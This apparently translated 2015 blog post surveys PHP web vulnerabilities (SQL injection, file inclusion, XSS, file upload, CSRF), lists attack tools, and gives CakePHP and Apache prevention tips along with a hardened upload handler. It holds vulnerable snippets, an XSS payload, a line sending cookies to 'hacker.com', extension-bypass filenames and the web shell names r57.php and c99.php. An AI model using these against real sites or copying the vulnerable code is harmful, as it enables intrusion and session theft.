Summary Web Security 2015 on tutscode

PHP TECHNOLOGY JAVASCRIPT HTML

Posted on 2015-04-08 12:43:00


- The security holes & attacks
- Tools
- Prevention

SQL Injection

$sql = "Select * from users where user_id = '" .$_GET['id']. "'";
8-) : MySQL knowledge, [sqlmap]

File Inclusion

$file = $_GET['page']; //The page we wish to display
 
$content = file_get_contents($file);
$content = nl2br($content);
echo $content;
8-) : Linux knowledge

Cross-site scripting (XSS)

- XSS reflected
- XSS stored
<script>alert(1)</script>

window.location='http://hacker.com/?cookie='+document.cookie
8-) : web knowledge, [FireBug]

File Upload

if (isset($_POST['Upload'])) {
    /* Some recommend validation here { */
    /* Some recommend validation here } */

    $target_path = "uploads/";
    $target_path = $target_path . basename($_FILES['uploaded']['name']);

    if (!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
        echo '<pre>';
        echo 'Your image was not uploaded.';
        echo '</pre>';
    } else {
        echo '<pre>';
        echo $target_path . ' successfully uploaded!';
        echo '</pre>';
    }
}
Bypass validation
- Ext blacklist validation ⇒ pHp | php4 | php5 | xhtml
- Ext whitelist validation ⇒ shell.jpg.php | shell.jpg.PhP | shell.php;.jpg | shell.php%0delete0.jpg
- Check type ⇒ [Firefox Live HTTP Header] 
- Check mime type ⇒ (Not sure) What to upload: r57.php | c99.php
  8-) : [Live HTTP Headers] , [Burp Suite]

Cross-Site Request Forgery (CSRF)

8-) : web session, cookie, form post knowledge

Other

- Public admin login page
- Public Tiny MCE File Manager 
- Crawling by Google bot & other 
- robots.txt 
- Directory Listing
- chmod 777 -R
  8-) : General knowledge
  8-) : [Hydra] , [Burp Suite], Demo: timed brute-force attack (localhost)

Tools

Tool             URL                              Description
John the Ripper  http://www.openwall.com/john/    Crack passwords
THC-Hydra        https://www.thc.org/thc-hydra/   Brute force
sqlmap           http://sqlmap.org/               Check SQL injection
Burp Suite       http://portswigger.net/burp/
Nmap             http://nmap.org/                 Check open ports
MD5 Decrypt      http://www.md5online.org/
ModSecurity      https://www.modsecurity.org/     Web application firewall
Other tools:
 * Firefox add-ons
   - HTTP Fox: inspect HTTP requests
   - Live HTTP Headers: modify request headers
   - FireBug: edit cookies, …
   - User Agent Switcher: change the browser's user agent
 * PHP shells
   - r57.php
   - c99.php

Prevention

SQL Injection
- Default CakePHP support
 - Note: updateAll() needs its own handling
 - Install [Mod Security]
Cross-site scripting
- htmlentities() on output
File Upload
- Check the file extension
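The bypasses listed under File Upload and the "check the file extension" item here, worked into one handler as an added example (not code from the original post): it keys on the last extension only, sniffs the content with finfo instead of trusting the client's type, and stores the file under a server-generated name. The image whitelist, the uploads directory and the PHP 7.1+ requirement are assumptions.

```php
<?php
// Added example, not code from the original post: a stricter replacement for
// the upload handler above. The field name 'uploaded' comes from that snippet;
// the image whitelist and the uploads directory are assumptions (PHP 7.1+).

// Whitelist: extension => MIME type that libmagic must report for the content.
const ALLOWED_TYPES = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                       'png' => 'image/png', 'gif' => 'image/gif'];

// Returns [true, stored filename] on success or [false, reason] on rejection.
function store_image(array $file, string $dir): array
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return [false, 'no valid upload'];
    }
    $name = $file['name'];
    // A real NUL byte (the %00 trick) or a path separator in the client-supplied
    // name is never legitimate, so reject it before any other check.
    if (strpos($name, "\0") !== false || preg_match('~[/\\\\]~', $name)) {
        return [false, 'bad filename'];
    }
    // Judge only the LAST extension, lower-cased: "shell.jpg.PhP" and
    // "shell.jpg.php" both become "php" and fail the whitelist.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return [false, 'extension not allowed'];
    }
    // $_FILES['type'] is client-controlled (editable in Burp or Live HTTP
    // Headers), so sniff the bytes on disk instead of trusting it.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        return [false, "content is $mime, expected " . ALLOWED_TYPES[$ext]];
    }
    // Server-generated name: "shell.php;.jpg" is stored as <random>.jpg, so the
    // client's name never reaches the filesystem or any handler mapping.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $target = rtrim($dir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return [false, 'could not move file'];
    }
    chmod($target, 0644); // readable, never executable
    return [true, $stored];
}

if (isset($_POST['Upload'])) {
    // Keep the directory outside the web root, or serve it with no PHP handler.
    [$ok, $msg] = store_image($_FILES['uploaded'] ?? [], __DIR__ . '/uploads');
    echo '<pre>', htmlentities($ok ? "$msg uploaded" : "Rejected: $msg"), '</pre>';
}
```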
Cross-Site Request Forgery
- Reduce the session timeout
- Use POST for inserting and updating data
- Enable the Security component of CakePHP
Other
Crawling by Google bot
- Use robots.txt to block folders
Directory Listing
- Add Options -Indexes and Options -ExecCGI to the .htaccess file
- chmod folders to reasonable permissions; do not chmod 777 -R
Public Tiny MCE File Manager
- Give each logged-in user (session) its own directory hierarchy
/* ---------- Split directory for each user login { ---------- */
if (!isset($_SESSION['UserInfo']['id']))
{
    header('Location: /404.php');
    exit; // without exit the rest of the script would still run for anonymous users
}
else
{
    // Create the user's upload directory
    $userID = $_SESSION['UserInfo']['id'];
    $userDir = $current_path.$userID;
    if (!is_dir($userDir))   // the original tested an undefined $dirPath here
    {
        mkdir($userDir, 0755);   // not 0777: see "do not chmod 777 -R" above
        chmod($userDir, 0755);
    }

    $userThumb = $thumbs_base_path.$userID;
    if (!is_dir($userThumb))
    {
        mkdir($userThumb, 0755);
        chmod($userThumb, 0755);
    }

    // Reset the paths so the file manager only sees this user's folders
    $upload_dir .= $userID.'/';
    $current_path .= $userID.'/';
    $thumbs_base_path .= $userID.'/';
}
/* ---------- Split directory for each user login } ---------- */
Should also
- Add a captcha to the account registration form
- Hide the admin page link
  
 Author: DuyNB
 Translator: Hainq